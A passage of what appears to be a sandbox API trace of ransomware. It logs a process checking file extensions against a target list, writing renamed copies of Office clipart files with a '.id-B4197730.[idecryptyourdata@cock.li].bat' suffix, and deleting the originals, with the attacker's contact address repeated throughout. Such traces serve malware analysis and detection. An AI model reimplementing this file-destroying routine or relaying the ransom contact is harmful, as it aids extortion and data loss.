(lpString1=".pdf", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString=".xls") returned 4 [0184.531] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.531] lstrlenW (lpString=".xlsx") returned 5 [0184.531] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.531] lstrlenW (lpString=".ppt") returned 4 [0184.531] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.531] lstrlenW (lpString=".zip") returned 4 [0184.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.531] lstrlenW (lpString=".rar") returned 4 [0184.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString=".bz2") returned 4 [0184.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString=".7z") returned 3 [0184.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.531] lstrlenW (lpString=".dbf") returned 4 [0184.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.531] lstrlenW (lpString=".1cd") returned 4 [0184.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.532] lstrlenW (lpString=".jpg") returned 4 [0184.532] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.532] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.532] lstrlenW (lpString="J0107514.WMF") returned 12 [0184.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.533] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=12204) returned 1 [0184.533] CloseHandle (hObject=0x360) returned 1 [0184.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf")) returned 0x220 [0184.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.533] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.533] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.535] GetLastError () returned 0x0 [0184.535] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2fac, lpOverlapped=0x0) returned 1 [0184.537] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2fb0, lpOverlapped=0x0) returned 1 [0184.538] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.538] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.538] SetEndOfFile (hFile=0x368) returned 1 [0184.539] CloseHandle (hObject=0x368) returned 1 [0184.539] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.539] SetEndOfFile (hFile=0x360) returned 1 [0184.540] CloseHandle (hObject=0x360) returned 1 [0184.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.540] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf")) returned 1 [0184.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.540] lstrlenW (lpString=".doc") returned 4 [0184.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.540] lstrlenW (lpString=".docx") returned 5 [0184.540] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.540] lstrlenW (lpString=".pdf") returned 4 [0184.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.540] lstrlenW (lpString=".xls") returned 4 [0184.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.541] lstrlenW (lpString=".xlsx") returned 5 [0184.541] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.541] lstrlenW (lpString=".ppt") returned 4 [0184.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString=".zip") returned 4 [0184.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.541] lstrlenW (lpString=".rar") returned 4 [0184.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString=".bz2") returned 4 [0184.541] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString=".7z") returned 3 [0184.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString=".dbf") returned 4 [0184.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString=".1cd") returned 4 [0184.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString=".jpg") returned 4 [0184.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.541] lstrlenW (lpString=".doc") returned 4 [0184.543] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.543] lstrlenW (lpString=".docx") returned 5 [0184.543] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.543] lstrlenW (lpString=".pdf") returned 4 [0184.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.543] lstrlenW (lpString=".xls") returned 4 [0184.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.543] lstrlenW (lpString=".xlsx") returned 5 [0184.543] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.543] lstrlenW (lpString=".ppt") returned 4 [0184.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.543] lstrlenW (lpString=".zip") returned 4 [0184.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.543] lstrlenW (lpString=".rar") returned 4 [0184.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.543] lstrlenW (lpString=".bz2") returned 4 [0184.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.543] lstrlenW (lpString=".7z") returned 3 [0184.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.544] lstrlenW (lpString=".dbf") returned 4 [0184.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.544] lstrlenW (lpString=".1cd") returned 4 [0184.544] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF") returned 68 [0184.544] lstrlenW (lpString=".jpg") returned 4 [0184.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.544] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.544] lstrlenW (lpString="J0107516.WMF") returned 12 [0184.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0184.816] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=14008) returned 1 [0184.816] CloseHandle (hObject=0x388) returned 1 [0184.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf")) returned 0x220 [0184.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0184.816] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.816] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.817] GetLastError () returned 0x0 [0184.817] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x36b8, lpOverlapped=0x0) returned 1 [0184.965] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x36c0, lpOverlapped=0x0) returned 1 [0184.966] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.966] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.966] SetEndOfFile (hFile=0x360) returned 1 [0184.967] CloseHandle (hObject=0x360) returned 1 [0184.967] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.967] SetEndOfFile (hFile=0x388) returned 1 [0184.968] CloseHandle (hObject=0x388) returned 1 [0184.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.968] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf")) returned 1 [0184.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.968] lstrlenW (lpString=".doc") returned 4 [0184.968] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.968] lstrlenW (lpString=".docx") returned 5 [0184.968] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.968] lstrlenW (lpString=".pdf") returned 4 [0184.969] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString=".xls") returned 4 [0184.969] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.969] lstrlenW (lpString=".xlsx") returned 5 [0184.969] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.969] lstrlenW (lpString=".ppt") returned 4 [0184.969] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString=".zip") returned 4 [0184.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.969] lstrlenW (lpString=".rar") returned 4 [0184.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString=".bz2") returned 4 [0184.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString=".7z") returned 3 [0184.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString=".dbf") returned 4 [0184.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString=".1cd") returned 4 [0184.969] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString=".jpg") returned 4 [0184.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.969] lstrlenW (lpString=".doc") returned 4 [0184.970] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString=".docx") returned 5 [0184.970] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.970] lstrlenW (lpString=".pdf") returned 4 [0184.970] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString=".xls") returned 4 [0184.970] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.970] lstrlenW (lpString=".xlsx") returned 5 [0184.970] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.970] lstrlenW (lpString=".ppt") returned 4 [0184.970] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.970] lstrlenW (lpString=".zip") returned 4 [0184.970] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.970] lstrlenW (lpString=".rar") returned 4 [0184.970] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString=".bz2") returned 4 [0184.970] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString=".7z") returned 3 [0184.970] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.970] lstrlenW (lpString=".dbf") returned 4 [0184.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.970] lstrlenW (lpString=".1cd") returned 4 [0184.970] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF") returned 68 [0184.970] lstrlenW (lpString=".jpg") returned 4 [0184.970] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.971] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.971] lstrlenW (lpString="J0107724.WMF") returned 12 [0184.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0184.971] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=7016) returned 1 [0184.971] CloseHandle (hObject=0x388) returned 1 [0184.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf")) returned 0x220 [0184.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0184.972] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.972] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.973] GetLastError () returned 0x0 [0184.973] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1b68, lpOverlapped=0x0) returned 1 [0184.993] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1b70, lpOverlapped=0x0) returned 1 [0184.994] ReadFile (in: hFile=0x388, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.994] WriteFile (in: hFile=0x360, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.994] SetEndOfFile (hFile=0x360) returned 1 [0184.995] CloseHandle (hObject=0x360) returned 1 [0184.995] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.995] SetEndOfFile (hFile=0x388) returned 1 [0184.996] CloseHandle (hObject=0x388) returned 1 [0184.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf")) returned 1 [0184.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.996] lstrlenW (lpString=".doc") returned 4 [0184.996] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.996] lstrlenW (lpString=".docx") returned 5 [0184.996] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.996] lstrlenW (lpString=".pdf") returned 4 [0184.996] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString=".xls") returned 4 [0184.997] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.997] lstrlenW (lpString=".xlsx") returned 5 [0184.997] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.997] lstrlenW (lpString=".ppt") returned 4 [0184.997] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString=".zip") returned 4 [0184.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.997] lstrlenW (lpString=".rar") returned 4 [0184.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString=".bz2") returned 4 [0184.997] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString=".7z") returned 3 [0184.997] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString=".dbf") returned 4 [0184.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString=".1cd") returned 4 [0184.997] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString=".jpg") returned 4 [0184.997] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF") returned 68 [0184.997] lstrlenW (lpString=".doc") returned 4 [0184.997] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.997] lstrlenW (lpString=".docx") returned 5 [0184.997] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.998] lstrlenW (lpString=".pdf") returned 4 [0184.998] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString=".xls") returned 4 [0184.998] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.998] lstrlenW (lpString=".xlsx") returned 5 [0184.998] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.998] lstrlenW (lpString=".ppt") returned 4 [0184.998] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.998] lstrlenW (lpString="C:\\Program Files\\Microsoft 